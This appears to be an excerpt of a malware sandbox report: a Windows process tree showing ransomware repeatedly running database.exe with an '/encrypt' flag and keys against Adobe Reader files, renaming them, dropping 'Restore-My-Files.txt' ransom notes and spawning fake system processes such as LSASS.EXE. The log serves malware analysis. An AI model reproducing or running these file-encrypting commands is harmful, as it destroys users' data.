C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5780
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:3748
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5672
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:2564
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:764
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\Restore-My-Files.txt"5⤵PID:3484
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:988
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5008
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4892
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6368
-
C:\Windows\xk.exeC:\Windows\xk.exe6⤵PID:7736
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe6⤵PID:7744
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"6⤵PID:7784
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"6⤵PID:7800
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"6⤵PID:7656
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"6⤵PID:7916
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"6⤵PID:7972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 5766⤵
- Program crash
PID:7648
-
-
C:\Windows\SysWOW64\Shell.exe"C:\Windows\system32\Shell.exe"6⤵PID:7612
-
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\Restore-My-Files.txt"5⤵PID:4860
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:5976
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4976
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\Restore-My-Files.txt"5⤵PID:4788
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\Restore-My-Files.txt"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5412
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1172
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6136
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\Restore-My-Files.txt"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3300
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4220
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5720
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4772
-
-
